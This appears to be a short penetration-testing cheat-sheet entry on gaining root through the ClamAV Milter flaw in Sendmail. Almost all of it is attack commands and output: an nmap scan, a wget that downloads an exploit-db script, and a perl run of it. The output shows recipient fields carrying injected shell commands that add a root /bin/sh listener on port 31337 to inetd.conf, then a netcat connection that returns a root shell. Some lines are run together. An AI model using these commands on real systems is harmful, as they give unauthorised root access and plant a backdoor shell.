ClamAV Milter with Sendmail
Discovery
nmap -sC -sV -p25 TARGET25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3Remote Root Exploit
wget https://www.exploit-db.com/raw/4761
perl 4761 TARGET250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
250 2.0.0 Message accepted for deliverync TARGET 31337
id
# uid=0(root) gid=0(root) groups=0(root)Reference
Last updated